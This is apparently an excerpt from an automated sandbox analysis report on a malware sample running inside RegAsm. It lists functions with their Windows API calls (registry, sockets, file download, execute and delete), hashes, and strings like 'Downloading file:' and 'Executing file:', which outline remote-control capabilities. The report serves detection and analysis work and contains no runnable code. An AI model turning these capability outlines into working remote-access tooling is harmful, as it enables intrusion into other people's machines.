                    • RegQueryValueExA.KERNEL32 ref: 0041352A
                    • RegCloseKey.KERNEL32(?), ref: 00413535
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseOpenQueryValue
                    • String ID:
                    • API String ID: 3677997916-0
                    • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                    • Instruction ID: ffaae2385a847085e6fb085aa4760e2a706d619ab1068a3de776aab9102a8dd7
                    • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                    • Instruction Fuzzy Hash: 46E06D32801238FB9F204FA2DC0DDEB7F6CEF06FA2B000155BD0DA2112E2258E50E6E4
                    Function 00413877 Relevance: 4.5, APIs: 3, Instructions: 30registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                    • RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                    • RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateValue
                    • String ID:
                    • API String ID: 1818849710-0
                    • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                    • Instruction ID: 04a42b38e2882b978ed87177a7d0f50f8458418d63be9de7f69fe35b215911ab
                    • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                    • Instruction Fuzzy Hash: 16E06572500318FBEF115F90DC05FEA7B6CDF04B52F1045A5BF09A6191D3358E549798
                    Function 0044EDC4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                    Download Yara Rule
                    APIs
                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EDE9
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Info
                    • String ID:
                    • API String ID: 1807457897-3916222277
                    • Opcode ID: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
                    • Instruction ID: 44bbd8f54034b75cb3f6f6e84f1b5a7d7ac270184ed4e74474e217fcd589b3ab
                    • Opcode Fuzzy Hash: a85cb1b2b9373234b1d7ad287e33ad953b4b977bb3bdbd209019650f1141d576
                    • Instruction Fuzzy Hash: 74411E705043489AEF218F65CC84AF7BBB9FF45308F2408EEE59A87142D2399E45DF65
                    Function 00409DE4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wcslen
                    • String ID: pQG
                    • API String ID: 176396367-3769108836
                    • Opcode ID: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                    • Instruction ID: e6961f6084f98a1e57a9a6385a58e5d20214d93246a99e64d0d6a4ea431d93e1
                    • Opcode Fuzzy Hash: 1f3b91536cece4da7108cf24afec647958326f81796985407c04b0a2ae37731c
                    • Instruction Fuzzy Hash: 8111C3319002059BCB15EF65E8529EF7BB5EF54318B10013FF406A62E2EFB8AD05CB98
                    Function 00448BB3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448C24
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: String
                    • String ID: LCMapStringEx
                    • API String ID: 2568140703-3893581201
                    • Opcode ID: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
                    • Instruction ID: 91dcaeff4e4508283399e99d6512adb219adb357de156da575c9a111b1dd59a7
                    • Opcode Fuzzy Hash: 0d5bd11df5ef9a2e9891dfdca4fac69d3ce43e49c64e471a80bfc951609a4a07
                    • Instruction Fuzzy Hash: 3F016532500209FBCF029F90DC01EEE7F62EF08351F10452AFE0925161CA3A8971AB99
                    Function 00448A84 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BF4F,-00000020,00000FA0,00000000,00467378,00467378), ref: 00448ACF
                    Strings
                    • InitializeCriticalSectionEx, xrefs: 00448A9F
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CountCriticalInitializeSectionSpin
                    • String ID: InitializeCriticalSectionEx
                    • API String ID: 2593887523-3084827643
                    • Opcode ID: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
                    • Instruction ID: 658be74961f29c719de8c28810f5b4ff6aac6a213607643c1e3aaf487ccb6ecc
                    • Opcode Fuzzy Hash: 682e35b38dfd5190380aa89288d85395b8b8c573abd287f9b51c67f13ec4e10f
                    • Instruction Fuzzy Hash: 12F0E235640208FBCF019F51DC06EAE7F61EF48722F10816AFC096A261DE799D25ABDD
                    Function 00448710 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Alloc
                    • String ID: FlsAlloc
                    • API String ID: 2773662609-671089009
                    • Opcode ID: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
                    • Instruction ID: c1fb2f6f3e96c04a711f36652bc0978b46922b6b0bac1ff16f6cb7e5114ce70e
                    • Opcode Fuzzy Hash: b059b7acde134c04013a83b120bbe810436e60e70eecf54d389d9c1387c32ac7
                    • Instruction Fuzzy Hash: 98E02B30640218E7D700AF65DC16A6EBB94CF48B12B20057FFD0557391DE786D0595DE
                    Function 00438D94 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    • try_get_function.LIBVCRUNTIME ref: 00438DA9
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: try_get_function
                    • String ID: FlsAlloc
                    • API String ID: 2742660187-671089009
                    • Opcode ID: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
                    • Instruction ID: 997240ade825b32cd49e327dc5ad0f79abc42783939d358afc793268dfa947f7
                    • Opcode Fuzzy Hash: 5196da0208b4c88d7e80b60f7c4aa489d06214170f9357b8a7661789506c7008
                    • Instruction Fuzzy Hash: 1FD05B31B8172866861036D56C02B99F654CB45BF7F14106BFF0875293999D581451DE
                    Function 0041B7B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                    Download Yara Rule
                    APIs
                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 0041B7CA
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: GlobalMemoryStatus
                    • String ID: @
                    • API String ID: 1890195054-2766056989
                    • Opcode ID: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                    • Instruction ID: 2d2b64c70bc766df394076410504e3f9c8f669937c614d63c6700d8895b1c70c
                    • Opcode Fuzzy Hash: 2ff32e62116e468e6d8a54eb6c0bfd9d688f6c12eac0596ef65494206548ed21
                    • Instruction Fuzzy Hash: E6D017B58023189FC720DFA8E804A8DBBFCFB08210F00456AEC49E3700E770E8008B94
                    Function 0044F119 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0044EFBA,?,00000000), ref: 0044F18D
                    • GetCPInfo.KERNEL32(00000000,0044EFBA,?,?,?,0044EFBA,?,00000000), ref: 0044F1A0
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CodeInfoPageValid
                    • String ID:
                    • API String ID: 546120528-0
                    • Opcode ID: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
                    • Instruction ID: 3b7bf12515eb554c774b4e527f81d40cffab4a6430697902d987c8214247c1f3
                    • Opcode Fuzzy Hash: 0fcd41bea27e2464632381dc73460c859b02871e76ebf75d2761c723038ba765
                    • Instruction Fuzzy Hash: BB5116749002469EFB24CF76C8816BBBBE5FF41304F1444BFD08687251D6BE994ACB99
                    Function 0044EF58 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                      • Part of subcall function 0044F077: _abort.LIBCMT ref: 0044F0A9
                      • Part of subcall function 0044F077: _free.LIBCMT ref: 0044F0DD
                      • Part of subcall function 0044ECEC: GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                    • _free.LIBCMT ref: 0044EFD0
                    • _free.LIBCMT ref: 0044F006
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorLast_abort
                    • String ID:
                    • API String ID: 2991157371-0
                    • Opcode ID: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
                    • Instruction ID: 3a29b68b49955ca98559fee15c42126097606514ccea0e67eec2104835090475
                    • Opcode Fuzzy Hash: 23ed7ce0d1312216544e861ed2cc667081b9de49bf4146cfd61311aa69b4ec7f
                    • Instruction Fuzzy Hash: FD31D531904104BFFB10EB6AD440B9EB7E4FF40329F2540AFE5149B2A1DB399D45CB48
                    Function 004484CA Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7,00000000), ref: 0044852A
                    • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00448537
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc__crt_fast_encode_pointer
                    • String ID:
                    • API String ID: 2279764990-0
                    • Opcode ID: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                    • Instruction ID: 198cd69cd453a5762926ca534f03dc7b1e1ac857a4a5158ec5eb6717dc05f104
                    • Opcode Fuzzy Hash: 8089c10b092d0b8b49c4e4c687cc442f2ac99aa31dc0a9ae19eeba6ee39a8a7d
                    • Instruction Fuzzy Hash: C3113A37A00131AFEB21DE1CDC4195F7391EB80724716452AFC08AB354DF34EC4186D8
                    Function 00446185 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 004461A6
                      • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                    • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F02,00000000,0000000F,0042F90C,?,?,004319B3,?,?,00000000), ref: 004461E2
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap$_free
                    • String ID:
                    • API String ID: 1482568997-0
                    • Opcode ID: 365bd7ee977071c6a41bb961a5dd0d7818d2ba038ed0d9e6099f468a5701a404
                    • Instruction ID: bbbbf11ac8836aedddebace835184d628c0e8eb9448606daf7135ff7baabef38
                    • Opcode Fuzzy Hash: 365bd7ee977071c6a41bb961a5dd0d7818d2ba038ed0d9e6099f468a5701a404
                    • Instruction Fuzzy Hash: ACF0683120051566BF212A16AD01B6F375D8F83B75F17411BF91466292DE3CD911916F
                    Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                    Download Yara Rule
                    APIs
                    • socket.WS2_32(?,00000001,00000006), ref: 00404852
                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                      • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateEventStartupsocket
                    • String ID:
                    • API String ID: 1953588214-0
                    • Opcode ID: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                    • Instruction ID: 7af5cc85a36d800a693892934b5c0b91abe86707509305098cc6d5fca1b6a633
                    • Opcode Fuzzy Hash: afd00016faedd330142d6470bb716eda446324a36170d88fbab64c940495e811
                    • Instruction Fuzzy Hash: 6E0171B1408B809ED7359F38A8456977FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                    Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                    • Instruction ID: 20740d68f627359004b4f50e822579efa7e6dd26000e0d34fcfb16e84f8f3500
                    • Opcode Fuzzy Hash: dd3aabd753e8fbc850dd588cbaeb9a0baf8afa37155383fde8690b9b823aeb90
                    • Instruction Fuzzy Hash: 6EF0E2706042015BDB1C8B34CD60B2A36955B84315F288F3FF01AD61E0C73EC8918A0D
                    Function 0041BA96 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$ForegroundText
                    • String ID:
                    • API String ID: 29597999-0
                    • Opcode ID: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                    • Instruction ID: 4615795adb372a642f3ed3ff298372a60f443b3219566b47796808df054d69ed
                    • Opcode Fuzzy Hash: 3324f64634fda987d6d57ad9b9c1a74d02492aa66b07baf7772615d4eb65d97a
                    • Instruction Fuzzy Hash: CCE0D875A00328A7E720A7A49C4EFE5776CEB08701F0000EEBA18D71C2EAB4AD04C7E4
                    Function 00414EE9 Relevance: 3.0, APIs: 2, Instructions: 21networkCOMMON
                    Download Yara Rule
                    APIs
                    • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,00415188,00000000,00000001), ref: 00414F0B
                    • WSASetLastError.WS2_32(00000000), ref: 00414F10
                      • Part of subcall function 00414D86: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414DD5
                      • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E17
                      • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E37
                      • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E3E
                      • Part of subcall function 00414D86: LoadLibraryA.KERNEL32(?), ref: 00414E76
                      • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E88
                      • Part of subcall function 00414D86: FreeLibrary.KERNEL32(00000000), ref: 00414E8F
                      • Part of subcall function 00414D86: GetProcAddress.KERNEL32(00000000,?), ref: 00414E9E
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                    • String ID:
                    • API String ID: 1170566393-0
                    • Opcode ID: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                    • Instruction ID: cadd3d9b0d0923a9352550a0b766658ea18523973fceddbfefdc7c35282954d4
                    • Opcode Fuzzy Hash: 6695e73d4224f512b623112065335d5dbc2e445aee0e7ca71efd6bc9c5f08a3e
                    • Instruction Fuzzy Hash: 9ED017322015316BD320A769AC01AFBAA9EDBD7771B16003BFA08D3210D6949C8282E8
                    Function 0043A3EC Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00438D94: try_get_function.LIBVCRUNTIME ref: 00438DA9
                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40A
                    • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A415
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                    • String ID:
                    • API String ID: 806969131-0
                    • Opcode ID: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
                    • Instruction ID: 13a2799ba917d8b657c14e130d7338f5d7a652e6d8bc03527a2a5cb893e190b1
                    • Opcode Fuzzy Hash: b65774da924b1ebf27bf40d163950e62dcf9712d149a04772a22db3bc715a471
                    • Instruction Fuzzy Hash: 23D0A920088310241C14A3792C0F19B53442A3A7BCF70726FFAF4861C3EEDC8062612F
                    Function 0043AA1B Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: __alldvrm
                    • String ID:
                    • API String ID: 65215352-0
                    • Opcode ID: 28369f91ca91e66110a0b1c9409ed0194f098364de9e422e31faff2ad6e8f38b
                    • Instruction ID: 96d9d97d68b67d0c8e80b5665a39335b0ee5c72343be31c2f0b4d265a228e715
                    • Opcode Fuzzy Hash: 28369f91ca91e66110a0b1c9409ed0194f098364de9e422e31faff2ad6e8f38b
                    • Instruction Fuzzy Hash: 08012872950318BFDB24EF64C942B6E77ECEB0531DF10846FE48597240C6799D00C75A
                    Function 00446137 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                    • Instruction ID: 4903450aafda00484806ba385278610c2731405ed8485190d5fd86014b6ab98c
                    • Opcode Fuzzy Hash: 091c80118a57d95ebc2facbedd4e69ebcf5b938ae1e913472e35806a21779949
                    • Instruction Fuzzy Hash: 92E0ED3120062577FB2226669D05B5B365D9F033A2F160127EC0AA2283DF7CCC0081EF
                    Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                    Download Yara Rule
                    APIs
                    • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Startup
                    • String ID:
                    • API String ID: 724789610-0
                    • Opcode ID: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                    • Instruction ID: a24ce82555f98f109a53945ea9c337c8597cdca763f75144b39f195b4e3f482d
                    • Opcode Fuzzy Hash: d1a3cfe2fad2e3cb4d6962b6d8b640ceb39eb3bb27a9d976f59a5119cf7f3e63
                    • Instruction Fuzzy Hash: 0DD0C9325586088AE620AAB4AD0B8A4775C8312615F0007AA6CA5835D2E6446A19C2AA
                    Function 00426CC8 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: send
                    • String ID:
                    • API String ID: 2809346765-0
                    • Opcode ID: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                    • Instruction ID: 80dceff54fd7c7607e374e8a405dba3f032bb15cdc3f4a53630576a73fa931ff
                    • Opcode Fuzzy Hash: a64cf630b3b4fcbf92e6cf8d3c010959396a6b24f5439efeece66edae75e3506
                    • Instruction Fuzzy Hash: 79B09279108202FFCB150B60CD0887A7EAAABC8381F008A2CB187411B1C636C852AB26
                    Function 00426CB1 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: recv
                    • String ID:
                    • API String ID: 1507349165-0
                    • Opcode ID: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                    • Instruction ID: 54da5cb0358175ea3eef87e0ba5f02fe09cc36e19498aa822303b7a5c5cf0de8
                    • Opcode Fuzzy Hash: 12f17b9eb2b05ccee17ecde8d051cd75af37e2c2e0a2002d53484fbbe037e517
                    • Instruction Fuzzy Hash: 38B09B75108302FFC6150750CC0486A7D66DBC8351B00481C714641170C736C8519725

                    Non-executed Functions

                    Function 00407C97 Relevance: 44.6, APIs: 10, Strings: 15, Instructions: 835filesleepCOMMON
                    Download Yara Rule
                    APIs
                    • SetEvent.KERNEL32(?,?), ref: 00407CB9
                    • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407D87
                    • DeleteFileW.KERNEL32(00000000), ref: 00407DA9
                      • Part of subcall function 0041C291: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                      • Part of subcall function 0041C291: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                      • Part of subcall function 0041C291: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                      • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                      • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                      • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00408197
                    • GetLogicalDriveStringsA.KERNEL32 ref: 00408278
                    • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084C4
                    • DeleteFileA.KERNEL32(?), ref: 00408652
                      • Part of subcall function 0040880C: __EH_prolog.LIBCMT ref: 00408811
                      • Part of subcall function 0040880C: FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                      • Part of subcall function 0040880C: __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                      • Part of subcall function 0040880C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                    • Sleep.KERNEL32(000007D0), ref: 004086F8
                    • StrToIntA.SHLWAPI(00000000), ref: 0040873A
                      • Part of subcall function 0041C9E2: SystemParametersInfoW.USER32 ref: 0041CAD7
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                    • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                    • API String ID: 1067849700-181434739
                    • Opcode ID: 4e58a0086eefa5a7d711f599d6b504f8132a4b145ccff10764beb7e3a44898d0
